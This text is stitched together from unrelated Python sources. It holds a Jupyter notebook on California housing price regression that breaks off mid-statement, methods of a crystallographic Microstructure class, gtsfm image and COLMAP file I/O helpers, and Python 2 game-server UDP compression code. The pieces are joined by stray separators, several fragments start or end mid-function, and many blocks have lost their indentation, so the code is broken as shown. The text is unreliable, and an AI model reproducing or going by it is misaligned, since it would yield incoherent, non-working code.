# Note that the **block groups are called "districts"** in the Jupyter notebooks, simply because in some contexts the name "block group" was confusing.
#
# ### Content
# The data aren't cleaned so there are some preprocessing steps that were
# required.
#
# The data file weighs about 1.35 MB and has 20,640 rows and 10 columns.
# The names of the columns are pretty self explanatory:
# 1. longitude: A measure of how far west a house is; a higher value is farther west
# 2. latitude: A measure of how far north a house is; a higher value is farther north
# 3. housing_median_age: Median age of a house within a block; a lower number is a newer building **("Block" == "District")**
# 4. total_rooms: Total number of rooms within a block
# 5. total_bedrooms: Total number of bedrooms within a block
# 6. population: Total number of people residing within a block
# 7. households: Total number of households, a group of people residing within a home unit, for a block
# 8. median_income: Median income for households within a block of houses (measured in tens of thousands of US Dollars)
# 9. median_house_value: Median house value for households within a block (measured in US Dollars)
# 10. ocean_proximity: Location of the house w.r.t ocean/sea
#
# ### Tweaks
# The dataset in this directory is almost identical to the original, with two differences:
# - 207 values were randomly removed from the **total_bedrooms** column, so we can
# discuss what to do with **missing data**.
# - An additional categorical attribute called **ocean_proximity** was added, indicating (very roughly) whether each block group is near the ocean, near the Bay area, inland or on an island. This allows discussing what to do with **categorical data**.
#
#
# ## Import statements
#
#
# In[ ]:
# General tools
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# statsmodels package
import statsmodels.api as sm
import statsmodels.formula.api as smf
# For transformations and predictions
from sklearn.preprocessing import FunctionTransformer
from sklearn.linear_model import LinearRegression
from scipy.optimize import curve_fit
from sklearn.tree import DecisionTreeRegressor, export_graphviz
from itertools import product
from sklearn.neighbors import KNeighborsRegressor
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import pairwise_distances
from sklearn.model_selection import KFold, cross_val_score
from sklearn.decomposition import PCA
# For the tree visualization
import pydot
from IPython.display import Image
from sklearn.externals.six import StringIO
# For scoring
from sklearn.metrics import mean_squared_error as mse
from sklearn.metrics import mean_squared_log_error as msle
# For split
from sklearn.model_selection import train_test_split as split
from sys import modules
import warnings
warnings.filterwarnings('ignore')
# ## Get the data
# **Upload**
# In[ ]:
if 'google.colab' in modules:
from google.colab import files
uploaded = files.upload()
# **Read file**
# In[ ]:
housing_df = pd.read_csv("../../../input/camnugent_california-housing-prices/housing.csv")
housing_df.shape
# In[ ]:
housing_df
# ## EDA with map visualization
# One good practice is to do EDA on the full data and **creating a copy** of it for not harming our test and training data.
# In[ ]:
plotter_df = housing_df.copy()
# In[ ]:
from PIL import Image
plt.figure(figsize=(20,10))
img = np.array(Image.open("california.jpg"))
plt.imshow(img, interpolation = "bilinear")
plt.axis("off")
print()
# **Since there is geographical information (latitude and longitude), it is a good idea to create a scatterplot of all districts to visualize the data.**
# In order to have an informative look on the plot we need to know the density for each point, so we use alpha=0.1 (transparency measure).
# In[ ]:
plt.figure(figsize=(10,8))
plt.scatter('longitude', 'latitude', data=plotter_df,alpha=0.1)
plt.ylabel('Latitudes')
plt.xlabel('Longitudes')
plt.title('Geographical plot of Latitudes/Longitudes')
print()
# **median_income** influence on **median_house_value.**
# In[ ]:
plotter_df.plot(kind='scatter', x='longitude', y='latitude', alpha=0.4,s=plotter_df['median_income']*30, label='median_income', figsize=(10,7),c='median_house_value', cmap=plt.get_cmap('jet'), colorbar=True)
plt.xlabel("Longitude", fontsize=14)
plt.ylabel("Latitude", fontsize=14)
plt.legend()
print()
# ## Look at the Data
# In[ ]:
housing_df.head()
# In[ ]:
housing_df.describe(include='all')
# In[ ]:
housing_df.info()
# We can see that the 'total_bedrooms' column has only 20,433 non-null values compared to 20,640 non-null values in other columns.
#
#
# In[ ]:
housing_df.isna().sum()
# # Data Cleaning
# ## Handling missing values
# Most Machine Learning algorithms cannot work with missing features, so let’s create a few functions to take care of them. We noticed earlier that the total_bedrooms attribute has some missing values, so let’s fix this. We have three options:
# 1. Get rid of the corresponding districts.
# 2. Get rid of the whole attribute.
# 3. Set the values to some value (zero, the mean, the median, etc.)
# In[ ]:
# Option 1: dropping rows (districts) with missing values
housing_df.dropna(subset=["total_bedrooms"], inplace=True)
housing_df.shape
# In[ ]:
# Option 2: dropping the whole column
#housing_df.drop("total_bedrooms", axis=1, inplace=True)
#housing_df.shape
# In[ ]:
# Option 3: fill NA values
#median_total_bedrooms = housing_df["total_bedrooms"].median()
#housing_df["total_bedrooms"].fillna(median_total_bedrooms, inplace=True)
#housing_df.shape
# ## Handling ocean_proximity categorical column.
# In[ ]:
housing_df['ocean_proximity'].value_counts()
# In[ ]:
housing_df.boxplot(column=['median_house_value'], by='ocean_proximity')
# We can see that there are only 5 rows with 'ocean_proximity'=='ISLAND'.
# We decided to drop these values.
# In[ ]:
housing_df.drop(housing_df[housing_df['ocean_proximity']=='ISLAND'].index, inplace=True)
housing_df.shape
# ### Transform categorical data to discrete values
# In[ ]:
ocean_proximity_order = ['INLAND','<1H OCEAN', 'NEAR OCEAN', 'NEAR BAY']
#ocean_proximity_order = ['<1H OCEAN', 'INLAND', 'NEAR OCEAN', 'NEAR BAY', 'ISLAND']
ocean_proximity_map = dict(zip(ocean_proximity_order, range(len(ocean_proximity_order))))
housing_df['ocean_proximity'] = housing_df['ocean_proximity'].map(ocean_proximity_map)
# In[ ]:
housing_df['ocean_proximity'].value_counts()
# ## Creating new features and deleting unnecessary features
# 1. The total number of rooms in a district is not very useful if you don’t know how many
# households there are. What we really want is the number of rooms per household.
#
# 2. Similarly, the total number of bedrooms by itself is not very useful: We want to compare it to the number of rooms.
#
# 3. The population per household also seems like an interesting attribute combination to look at.
# In[ ]:
housing_df["rooms_per_household"] = housing_df["total_rooms"]/housing_df["households"]
housing_df["bedrooms_per_room"] = housing_df["total_bedrooms"]/housing_df["total_rooms"]
housing_df["population_per_household"]=housing_df["population"]/housing_df["households"]
# In[ ]:
# dropping unnecessary features
housing_df.drop(["total_rooms","total_bedrooms","population"], axis=1, inplace=True)
housing_df.head()
# In[ ]:
housing_df.shape
# ## Split the data to train and test
# In[ ]:
housing_df_train, housing_df_test = split(housing_df, test_size=0.3, random_state=43)
# In[ ]:
housing_df_train.shape
# ## Removing Outliers
#
# we can see median_house_value and housing_median_age have "peaks"
# and this data should be removed.
# In[ ]:
housing_df_train.hist(bins=50,figsize=(20,15))
# In[ ]:
housing_df_train = housing_df_train[(housing_df_train.median_house_value < 500001) & (housing_df_train.housing_median_age < 52)]
housing_df_train.shape
# Now we drop data which is not in the range of 3 sigma (+/-).
# In[ ]:
for col in housing_df_train.columns:
if housing_df_train[col].dtype == 'float64':
std = housing_df_train[col].std()
ave = housing_df_train[col].mean()
housing_df_train_1 = housing_df_train.loc[housing_df_train[col].between(ave-3*std, ave+3*std)]
print(f'processing {col:10} --> {housing_df_train_1.shape[0]:5} rows remain')
# # Linear Regression model: Assumptions of Linear Regression:
#
# 1) Linear Relationship between the features and target
#
# 2) Little or no Multicollinearity between the features
#
# 3) Homoscedasticity
#
# 4) Normal distribution of error
#
# 5) Little or No autocorrelation in the residuals
# ### Check skewness (a measure of the asymmetry of a probability distribution)
# In[ ]:
housing_df_train_1.skew()
# In[ ]:
#log_rooms_per_household = np.log1p(housing_df_train_1['rooms_per_household'])
#log_population_per_household = np.log1p(housing_df_train_1['population_per_household'])
#log_households = np.log1p(housing_df_train_1['households'])
#log_bedrooms_per_room = np.log1p(housing_df_train_1['bedrooms_per_room'])
#housing_df_train_1['log_rooms_per_household'] = log_rooms_per_household
#housing_df_train_1['log_population_per_household'] = log_population_per_household
#housing_df_train_1['log_households'] = log_households
#housing_df_train_1['log_bedrooms_per_room'] = log_bedrooms_per_room
# dropping unnecessary features
#housing_df_train_1.drop(["rooms_per_household","population_per_household","households","bedrooms_per_room" ], axis=1, inplace=True)
#housing_df_train_1.skew()
# In[ ]:
housing_df_train_1.head()
# ## Split and scaling the data and preparation to model
# In[ ]:
X_train = housing_df_train_1.drop(['median_house_value'],axis=1)
y_train = housing_df_train_1['median_house_value']
# scaling the data
scaler = MinMaxScaler()
scaler.fit(X_train)
X_train_scaled = pd.DataFrame(scaler.transform(X_train), columns=X_train.columns)
X_train_scaled.head()
# #Linear Relationship between the features and target
# ## Correlation
# In[ ]:
corr_matrix = housing_df_train_1.corr()
# we can see that median_income and ocean_proximity have the most effect on
# median_house_value
# In[ ]:
corr_matrix['median_house_value'].sort_values(ascending=False)
# **We can see a small negative correlation between the latitude and the median house value (i.e., prices have a slight tendency to go down when you go north).**
# # Assumption check: Little or no Multicollinearity between the features
# In[ ]:
from statsmodels.stats.outliers_influence import variance_inflation_factor
variables = X_train_scaled
vif = pd.DataFrame()
vif["VIF"] = [variance_inflation_factor(variables.values, i) for i in range(variables.shape[1])]
vif["features"] = variables.columns
# In[ ]:
vif
# In[ ]:
X_train_scaled_1 = X_train_scaled.drop(['longitude','bedrooms_per_room'],axis=1)
# fit the linear model
# In[ ]:
regr = LinearRegression()
regr.fit(X_train_scaled_1, y_train)
y_train_pred = regr.predict(X_train_scaled_1)
resids = | |
grain ids can be used to restrict the grains.
A list of `Orientation` instances is then created and returned.
:param list id_list: a non empty list of the grain ids.
:return: a list of the grain orientations.
"""
rods = self.get_grain_rodrigues(id_list)
orientations = [Orientation.from_rodrigues(rod) for rod in rods]
return orientations
    def get_grain_bounding_boxes(self, id_list=None):
        """Get the grain bounding boxes.

        The grain data table is queried and the bounding boxes of the grains
        are returned in a single array. An optional list of grain ids can be
        used to restrict the grains, by default all the grain bounding boxes
        are returned.

        :param list id_list: a non empty list of the grain ids.
        :return: a numpy array containing the grain bounding boxes.
        """
        if id_list:
            # build a pytables selection condition from the id list
            # NOTE(review): eval() on the generated condition string — safe
            # only because id_list_to_condition builds it from ints; verify
            condition = Microstructure.id_list_to_condition(id_list)
            return self.grains.read_where(eval(condition))['bounding_box']
        else:
            # no filter: return the whole column
            return self.get_tablecol('GrainDataTable', 'bounding_box')
def get_voxel_size(self):
"""Get the voxel size for image data of the microstructure.
If this instance of `Microstructure` has no image data, None is returned.
"""
try:
return self.get_attribute(attrname='spacing',
nodename='/CellData')[0]
except:
return None
def get_grain(self, gid):
"""Get a particular grain given its id.
This method browses the microstructure and return the grain
corresponding to the given id. If the grain is not found, the
method raises a `ValueError`.
:param int gid: the grain id.
:return: The method return a new `Grain` instance with the corresponding id.
"""
try:
gr = self.grains.read_where('(idnumber == gid)')[0]
except:
raise ValueError('grain %d not found in the microstructure' % gid)
grain = Grain(gr['idnumber'],
Orientation.from_rodrigues(gr['orientation']))
grain.center = gr['center']
grain.volume = gr['volume']
return grain
def get_all_grains(self):
"""Build a list of `Grain` instances for all grains in this `Microstructure`.
:return: a list of the grains.
"""
grains_list = [self.get_grain(gid)
for gid in self.get_tablecol('GrainDataTable', 'idnumber')]
return grains_list
def get_grain_positions(self):
"""Return all the grain positions as a numpy array of shape (n, 3)
where n is the number of grains.
:return: a numpy array of shape (n, 3) of the grain positions.
"""
return self.grains[:]['center']
def get_grain_volume_fractions(self):
"""Compute all grains volume fractions.
:return: a 1D numpy array with all grain volume fractions.
"""
total_volume = np.sum(self.grains[:]['volume'])
return self.grains[:]['volume'] / total_volume
def get_grain_volume_fraction(self, gid, use_total_volume_value=None):
"""Compute the volume fraction of this grain.
:param int gid: the grain id.
:param float use_total_volume_value: the total volume value to use.
:return float: the grain volume fraction as a number in the range [0, 1].
"""
# compute the total volume
if use_total_volume_value:
total_volume = use_total_volume_value
else:
# sum all the grain volume to compute the total volume
total_volume = np.sum(self.get_grain_volumes())
volume_fraction = self.get_grain_volumes(id_list=[gid])[0] / total_volume
return volume_fraction
def set_orientations(self, orientations):
""" Store grain orientations array in GrainDataTable
orientation : (Ngrains, 3) array of rodrigues orientation vectors
"""
self.set_tablecol('GrainDataTable', 'orientation', column=orientations)
return
def set_centers(self, centers):
""" Store grain centers array in GrainDataTable
centers : (Ngrains, 3) array of grain centers of mass
"""
self.set_tablecol('GrainDataTable', 'center', column=centers)
return
def set_bounding_boxes(self, bounding_boxes):
""" Store grain bounding boxes array in GrainDataTable
"""
self.set_tablecol('GrainDataTable', 'bounding_box', column=bounding_boxes)
return
def set_volumes(self, volumes):
""" Store grain volumes array in GrainDataTable
"""
self.set_tablecol('GrainDataTable', 'volume', column=volumes)
return
def set_lattice(self, lattice, phase_id=None):
"""Set the crystallographic lattice associated with this microstructure.
If no `phase_id` is specified, the lattice will be set for the active
phase.
:param Lattice lattice: an instance of the `Lattice class`.
:param int phase_id: the id of the phase to set the lattice.
"""
if phase_id is None:
phase_id = self.active_phase_id
self.get_phase(phase_id)._lattice = lattice
def set_active_grain_map(self, map_name='grain_map'):
"""Set the active grain map name to inputed string.
The active_grain_map string is used as Name to get the grain_map field
in the dataset through the SampleData "get_field" method.
"""
self.active_grain_map = map_name
self.add_attributes({'active_grain_map':map_name}, 'CellData')
return
    def set_grain_map(self, grain_map, voxel_size=None,
                      map_name='grain_map'):
        """Set the grain map for this microstructure.

        If the CellData image group does not exist yet (or is empty), it is
        created from the grain map and `voxel_size` must then be provided.
        Otherwise the grain map is added as a new field of the existing
        image group.

        :param ndarray grain_map: a 2D or 3D numpy array.
        :param float voxel_size: the size of the voxels in mm unit. Used only
            if the CellData image Node must be created. May be a scalar or an
            array with one value per grain map dimension.
        :param str map_name: name under which the grain map field is stored.
        """
        # TODO: add compression_options
        create_image = True
        if self.__contains__('CellData'):
            empty = self.get_attribute(attrname='empty', nodename='CellData')
            if not empty:
                create_image = False
        if create_image:
            # a new image group is needed: the voxel size is mandatory
            if (voxel_size is None):
                msg = 'Please specify voxel size for CellData image'
                raise ValueError(msg)
            if np.isscalar(voxel_size):
                # isotropic spacing: one value per grain map dimension
                dim = len(grain_map.shape)
                spacing_array = voxel_size*np.ones((dim,))
            else:
                if len(voxel_size) != len(grain_map.shape):
                    raise ValueError('voxel_size array must have a length '
                                     'equal to grain_map shape')
                spacing_array = voxel_size
            self.add_image_from_field(field_array=grain_map,
                                      fieldname=map_name,
                                      imagename='CellData', location='/',
                                      spacing=spacing_array,
                                      replace=True)
        else:
            # Handle case of a 2D Microstructure: squeeze grain map to
            # ensure (Nx,Ny,1) array will be stored as (Nx,Ny)
            if self._get_group_type('CellData') == '2DImage':
                grain_map = grain_map.squeeze()
            self.add_field(gridname='CellData', fieldname=map_name,
                           array=grain_map, replace=True)
        self.set_active_grain_map(map_name)
        return
def set_phase_map(self, phase_map, voxel_size=None):
"""Set the phase map for this microstructure.
:param ndarray phase_map: a 2D or 3D numpy array.
:param float voxel_size: the size of the voxels in mm unit. Used only
if the CellData image Node must be created.
"""
# TODO: add compression_options
create_image = True
if self.__contains__('CellData'):
empty = self.get_attribute(attrname='empty', nodename='CellData')
if not empty:
create_image = False
if create_image:
if voxel_size is None:
msg = 'Please specify voxel size for CellData image'
raise ValueError(msg)
if np.isscalar(voxel_size):
dim = len(phase_map.shape)
spacing_array = voxel_size*np.ones((dim,))
else:
if len(voxel_size) != len(phase_map.shape):
raise ValueError('voxel_size array must have a length '
'equal to grain_map shape')
spacing_array = voxel_size
self.add_image_from_field(phase_map, 'phase_map',
imagename='CellData', location='/',
spacing=spacing_array,
replace=True)
else:
self.add_field(gridname='CellData', fieldname='phase_map',
array=phase_map, replace=True,
indexname='phase_map')
def set_mask(self, mask, voxel_size=None):
"""Set the mask for this microstructure.
:param ndarray mask: a 2D or 3D numpy array.
:param float voxel_size: the size of the voxels in mm unit. Used only
if the CellData image Node must be created.
"""
# TODO: add compression_options
create_image = True
if self.__contains__('CellData'):
empty = self.get_attribute(attrname='empty', nodename='CellData')
if not (empty):
create_image = False
if create_image:
if (voxel_size is None):
msg = 'Please specify voxel size for CellData image'
raise ValueError(msg)
if np.isscalar(voxel_size):
dim = len(mask.shape)
spacing_array = voxel_size*np.ones((dim,))
else:
if len(voxel_size) != len(mask.shape):
raise ValueError('voxel_size array must have a length '
'equal to grain_map shape')
spacing_array = voxel_size
self.add_image_from_field(mask, 'mask',
imagename='CellData', location='/',
spacing=spacing_array,
replace=True)
else:
self.add_field(gridname='CellData', fieldname='mask',
array=mask, replace=True, indexname='mask')
return
    def set_random_orientations(self):
        """Set random orientations for all grains in the GrainDataTable.

        Each grain row is updated in place with a new random orientation,
        stored as a Rodrigues vector, and the table is flushed to disk.
        """
        for grain in self.grains:
            o = Orientation.random()
            grain['orientation'] = o.rod
            # persist the modified row back into the pytables table
            grain.update()
        self.grains.flush()
        return
def remove_grains_not_in_map(self):
"""Remove from GrainDataTable grains that are not in the grain map."""
_,not_in_map,_ = self.compute_grains_map_table_intersection()
self.remove_grains_from_table(not_in_map)
return
    def remove_small_grains(self, min_volume=1.0, sync_table=False,
                            new_grain_map_name=None):
        """Remove from grain_map and grain data table small volume grains.

        Removed grains in grain map will be replaced by background ID (0).
        To be sure that the method acts consistently with the current grain
        map, activate the sync_table option.

        :param float min_volume: Grains whose volume is under or equal to this
            value will be suppressed from grain_map and grain data table.
        :param bool sync_table: If `True`, synchronize grain data table with
            grain map before removing grains.
        :param str new_grain_map_name: If provided, store the new grain map
            with removed grains under this new name. If not, overwrite the
            current active grain map.
        """
        if sync_table and not self._is_empty('grain_map'):
            self.sync_grain_table_with_grain_map(sync_geometry=True)
        # select the ids of all grains at or below the volume threshold
        condition = f"(volume <= {min_volume})"
        id_list = self.grains.read_where(condition)['idnumber']
        if not self._is_empty('grain_map'):
            # Remove grains from grain map
            grain_map = self.get_grain_map()
            grain_map[np.where(np.isin(grain_map,id_list))] = 0
            if new_grain_map_name is not None:
                map_name = new_grain_map_name
            else:
                map_name = self.active_grain_map
            self.set_grain_map(grain_map.squeeze(), map_name=map_name)
        # Remove grains from table
        self.remove_grains_from_table(id_list)
        return
def remove_grains_from_table(self, ids):
"""Remove from GrainDataTable the grains with given ids.
:param ids: Array of grain ids to remove from GrainDataTable
:type ids: list
"""
for Id in ids:
where = self.grains.get_where_list('idnumber == Id')[:]
self.grains.remove_row(int(where))
return
def add_grains(self, euler_list, grain_ids=None):
"""A a list of grains to this microstructure.
This function adds a list of grains represented by a list of Euler
angles triplets, to the microstructure. If provided, the `grain_ids`
list will be used for the grain ids.
:param list euler_list: the list of euler angles (Bunge passive convention).
:param list grain_ids: an optional list for the ids of the new grains.
"""
grain = self.grains.row
# build a | |
"""Functions to provide I/O APIs for all the modules.
Authors: <NAME>, <NAME>
"""
import json
import os
import pickle
from bz2 import BZ2File
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
import gtsam
import h5py
import numpy as np
from gtsam import Cal3Bundler, Rot3, Pose3
from PIL import Image as PILImage
from PIL.ExifTags import GPSTAGS, TAGS
import gtsfm.utils.images as image_utils
import gtsfm.utils.logger as logger_utils
import gtsfm.utils.reprojection as reproj_utils
from gtsfm.common.gtsfm_data import GtsfmData
from gtsfm.common.image import Image
from gtsfm.common.sfm_track import SfmTrack2d
logger = logger_utils.get_logger()
def load_image(img_path: str) -> Image:
    """Load an image from disk, converting to RGB if needed.

    Notes: EXIF is read as a map from (tag_id, value) where tag_id is an integer.
    Human-readable names are recovered through the TAGS / GPSTAGS lookup tables.

    Args:
        img_path (str): the path of image to load.

    Returns:
        loaded image in RGB format.
    """
    pil_image = PILImage.open(img_path)

    raw_exif = pil_image._getexif()
    if raw_exif is not None:
        named_exif = {}
        for tag_id, value in raw_exif.items():
            # map the numeric tag id to a human-readable name when known
            tag_name = TAGS.get(tag_id, GPSTAGS.get(tag_id, tag_id))
            named_exif[tag_name] = value
        raw_exif = named_exif

    if pil_image.mode != "RGB":
        pil_image = pil_image.convert("RGB")

    return Image(value_array=np.asarray(pil_image), exif_data=raw_exif, file_name=Path(img_path).name)
def save_image(image: Image, img_path: str) -> None:
    """Save an image to disk.

    Args:
        image (np.array): image to write.
        img_path (str): the destination path on disk.
    """
    PILImage.fromarray(image.value_array).save(img_path)
def load_h5(file_path: str) -> Dict[Any, Any]:
    """Load a dictionary from an HDF5 file.

    Args:
        file_path: path of the h5 file.

    Returns:
        the dictionary stored in the h5 file (dataset name -> array).
    """
    with h5py.File(file_path, "r") as f:
        return {key: f[key][:] for key in f.keys()}
def save_json_file(
    json_fpath: str,
    data: Union[Dict[Any, Any], List[Any]],
) -> None:
    """Save a Python dictionary or list to a JSON file.

    Parent directories are created if they do not exist yet.

    Args:
        json_fpath: Path to file to create.
        data: Python dictionary or list to be serialized.
    """
    parent_dir = os.path.dirname(json_fpath)
    if parent_dir:
        # guard: os.makedirs('') raises FileNotFoundError when json_fpath
        # is a bare filename in the current directory
        os.makedirs(parent_dir, exist_ok=True)
    with open(json_fpath, "w") as f:
        json.dump(data, f, indent=4)
def read_json_file(fpath: Union[str, Path]) -> Any:
    """Load a dictionary or list from a JSON file.

    Args:
        fpath: Path to JSON file.

    Returns:
        Deserialized Python dictionary or list.
    """
    with open(fpath) as f:
        return json.load(f)
def read_bal(file_path: str) -> GtsfmData:
    """Read a "Bundle Adjustment in the Large" (BAL) file.

    See https://grail.cs.washington.edu/projects/bal/ for more details on the format.

    Args:
        file_path: file path of the BAL file.

    Returns:
        The data as a GtsfmData object.
    """
    bal_data = gtsam.readBal(file_path)

    num_images = bal_data.number_cameras()
    gtsfm_data = GtsfmData(num_images)
    for cam_idx in range(num_images):
        gtsfm_data.add_camera(cam_idx, bal_data.camera(cam_idx))
    for track_idx in range(bal_data.number_tracks()):
        gtsfm_data.add_track(bal_data.track(track_idx))
    return gtsfm_data
def export_model_as_colmap_text(gtsfm_data: GtsfmData, images: List[Image], save_dir: str) -> None:
    """Emulate the COLMAP option to `Export model as text`.

    Three text files are saved to disk: "points3D.txt", "images.txt" and
    "cameras.txt".

    Args:
        gtsfm_data: scene data to write.
        images: list of all images for this scene, in order of image index.
        save_dir: folder where text files will be saved.
    """
    for writer in (write_cameras, write_images, write_points):
        writer(gtsfm_data, images, save_dir)
def read_cameras_txt(fpath: str) -> Optional[List[Cal3Bundler]]:
    """Read camera calibrations from a COLMAP-formatted cameras.txt file.

    Reference: https://colmap.github.io/format.html#cameras-txt

    Args:
        fpath: path to cameras.txt file.

    Returns:
        calibration object for each camera, or None if the file does not exist.
    """
    if not Path(fpath).exists():
        logger.info("%s does not exist", fpath)
        return None

    with open(fpath, "r") as f:
        lines = f.readlines()

    # may not be one line per camera (could be only one line of text if shared calibration)
    num_cams = int(lines[2].replace("# Number of cameras: ", "").strip())

    calibrations = []
    for line in lines[3:]:
        fields = line.split()
        # fields are: CAMERA_ID, MODEL, WIDTH, HEIGHT, fx, u0, v0, ...
        # (u0 is px and v0 is py)
        fx, u0, v0 = (float(v) for v in fields[4:7])
        # TODO: determine convention for storing/reading radial distortion parameters
        k1, k2 = 0, 0
        calibrations.append(Cal3Bundler(fx, k1, k2, u0, v0))

    assert len(calibrations) == num_cams
    return calibrations
def write_cameras(gtsfm_data: GtsfmData, images: List[Image], save_dir: str) -> None:
    """Write the camera data file in the COLMAP format.

    Reference: https://colmap.github.io/format.html#cameras-txt

    Args:
        gtsfm_data: scene data to write.
        images: list of all images for this scene, in order of image index.
        save_dir: folder to put the cameras.txt file in.
    """
    os.makedirs(save_dir, exist_ok=True)

    # TODO: handle shared intrinsics
    camera_model = "SIMPLE_RADIAL"

    valid_indices = gtsfm_data.get_valid_camera_indices()
    with open(os.path.join(save_dir, "cameras.txt"), "w") as f:
        f.write("# Camera list with one line of data per camera:\n")
        f.write("# CAMERA_ID, MODEL, WIDTH, HEIGHT, PARAMS[]\n")
        # we record the number of estimated cameras, not the number of input
        # images (which would be gtsfm_data.number_images()).
        f.write(f"# Number of cameras: {len(valid_indices)}\n")

        for i in valid_indices:
            calibration = gtsfm_data.get_camera(i).calibration()
            params = " ".join(
                str(p)
                for p in (
                    calibration.fx(),
                    calibration.px(),
                    calibration.py(),
                    calibration.k1(),
                    calibration.k2(),
                )
            )
            f.write(f"{i} {camera_model} {images[i].width} {images[i].height} {params}\n")
def read_images_txt(fpath: str) -> Tuple[Optional[List[Pose3]], Optional[List[str]]]:
    """Read camera poses and image file names from a COLMAP-format images.txt file.

    Reference: https://colmap.github.io/format.html#images-txt
    "The coordinates of the projection/camera center are given by -R^t * T, where
    R^t is the inverse/transpose of the 3x3 rotation matrix composed from the
    quaternion and T is the translation vector. The local camera coordinate system
    of an image is defined in a way that the X axis points to the right, the Y axis
    to the bottom, and the Z axis to the front as seen from the image."

    Args:
        fpath: path to images.txt file.

    Returns:
        wTi_list: list of camera poses for each image, or None if file path invalid.
        img_fnames: name of image file, for each image, or None if file path invalid.
    """
    if not Path(fpath).exists():
        logger.info("%s does not exist", fpath)
        return None, None

    with open(fpath, "r") as f:
        lines = f.readlines()

    wTi_list = []
    img_fnames = []
    # the first 4 lines are a description of the file format and a record of
    # the number of reconstructed images; every second line after that holds
    # the per-image POINTS2D data, which we skip
    for line in lines[4::2]:
        fields = line.split()
        qw, qx, qy, qz = (float(v) for v in fields[1:5])
        tx, ty, tz = fields[5:8]
        img_fname = fields[9]
        # COLMAP stores extrinsics (iTw), so invert to get the pose
        iRw = Rot3(qw, qx, qy, qz)
        wTi_list.append(Pose3(iRw, np.array([tx, ty, tz], dtype=np.float64)).inverse())
        img_fnames.append(img_fname)
    return wTi_list, img_fnames
def write_images(gtsfm_data: GtsfmData, images: List[Image], save_dir: str) -> None:
    """Write the image data file in the COLMAP format.

    Reference: https://colmap.github.io/format.html#images-txt

    Note: the "Number of images" saved to the .txt file is not the number of
    images fed to the SfM algorithm, but rather the number of localized camera
    poses/images, which COLMAP refers to as the "reconstructed cameras".

    Args:
        gtsfm_data: scene data to write.
        images: list of all images for this scene, in order of image index.
        save_dir: folder to put the images.txt file in.
    """
    os.makedirs(save_dir, exist_ok=True)

    num_imgs = gtsfm_data.number_images()
    # TODO: compute this (from keypoint data? or from track data?)
    mean_obs_per_img = 0

    with open(os.path.join(save_dir, "images.txt"), "w") as f:
        f.write("# Image list with two lines of data per image:\n")
        f.write("# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME\n")
        f.write("# POINTS2D[] as (X, Y, POINT3D_ID)\n")
        f.write(f"# Number of images: {num_imgs}, mean observations per image: {mean_obs_per_img}\n")

        for i in gtsfm_data.get_valid_camera_indices():
            # COLMAP exports camera extrinsics (cTw), not the poses (wTc), so must invert
            iTw = gtsfm_data.get_camera(i).pose().inverse()
            qw, qx, qy, qz = iTw.rotation().quaternion()
            tx, ty, tz = iTw.translation()
            f.write(f"{i} {qw} {qx} {qy} {qz} {tx} {ty} {tz} {i} {images[i].file_name}\n")
            # TODO: write out the points2d
            f.write("TODO\n")
def read_points_txt(fpath: str) -> Tuple[Optional[np.ndarray], Optional[np.ndarray]]:
"""Read 3d points and their associated colors from a COLMAP points.txt file.
Reference: https://colmap.github.io/format.html#points3d-txt
Args:
fpath: absolute file path to points.txt file
Returns:
point_cloud: float array of shape (N,3)
rgb: uint8 array of shape (N,3)
"""
if not Path(fpath).exists():
logger.info("%s does not exist", fpath)
return None, None
with open(fpath, "r") as f:
data = f.readlines()
rgb = []
point_cloud = []
# first 3 lines are information about the file format
# line at index 2 will be of | |
not None:
udpdatas = self.dynamic_compress(udpdata)
else:
udpdatas = [udpdata]
for udpdata in udpdatas:
try:
self.udpsockcounter += self.udpsocket.send(udpdata)
except error, e:
print >> sys.stderr, 'ignored:', str(e)
pass # ignore UDP send errors (buffer full, etc.)
if self.has_music > 1 and NOW >= self.musicstreamer:
self.musicstreamer += 0.99
self.sendmusicdata()
if not self.msgl:
if abs(NOW - self.activity) <= self.KEEP_ALIVE:
if abs(NOW - self.last_ping) <= self.force_ping_delay:
return
if self.udpsockcounter < 1024:
return
self.force_ping_delay += 0.2
self.msgl.append(message(MSG_PING, self.udpsockcounter>>10))
self.last_ping = NOW
    def setup_dyncompress(self):
        """Install the dynamic zlib compression generator for UDP frames.

        Three compression "threads" take turns emitting packets; they are
        periodically re-synchronized (local and global sync packets) so that
        a client can recover from lost UDP packets. A yielded pair
        (None, None) marks the end of the packets for one frame; a pair
        (None, co) asks the caller to feed the frame into compressor `co`
        without emitting a packet (to keep its dictionary in sync).
        """
        def dyncompress():
            # See comments in pclient.Playfield.dynamic_decompress().
            threads = []
            for t in range(3):
                co = zlib.compressobj(6)
                threads.append((chr(0x88 + t) + chr(t), co))
            frame = 0
            globalsync = 0
            while 1:
                # write three normal packets, one on each thread
                for t in range(3):
                    head, co = threads.pop(0)
                    yield head + chr(frame), co
                    threads.append((chr(ord(head[0]) & 0x87) + chr(frame), co))
                    yield None, None
                    frame = (frame + 1) & 0xFF
                # sync frame, write two packets (on two threads)
                # and restart compression at the current frame for these threads
                head, co = threads.pop(0)
                yield head + chr(frame), co
                co1 = zlib.compressobj(6)
                co2 = zlib.compressobj(6)
                globalsync += 1
                if globalsync == 4:
                    # next on this thread will be a global sync packet
                    nextframe = (frame + 2) & 0xFF
                    globalsync = 0
                else:
                    # next of this thread will be a local sync packet
                    yield None, co1
                    nextframe = frame
                threads.append((chr(ord(head[0]) | 8) + chr(nextframe), co1))
                # 2nd packet of the current frame
                head, co = threads.pop(0)
                yield head + chr(frame), co
                yield None, co2
                threads.append((chr(ord(head[0]) | 8) + chr(frame), co2))
                yield None, None
                frame = (frame + 1) & 0xFF
        self.dyncompress = dyncompress()
    def dynamic_compress(self, framedata):
        """Compress one frame of data into a list of UDP-ready packets.

        Drives the self.dyncompress generator: each (head, co) pair gives a
        packet header and the zlib compressor to use. A pair with co=None
        marks the end of this frame's packets.

        :param framedata: raw frame bytes to compress.
        :return: the list of packets to send for this frame.
        """
        result = []
        for head, co in self.dyncompress:
            if not co:
                return result
            # compress even when head is None: sync compressors must see the
            # frame data to keep their dictionaries up to date, but only
            # packets with a real header are emitted
            data = [head, co.compress(framedata), co.flush(zlib.Z_SYNC_FLUSH)]
            if head:
                result.append(''.join(data))
def send_can_mix(self):
return not self.msgl and self.socket is not None
    def send_buffer(self, buffer):
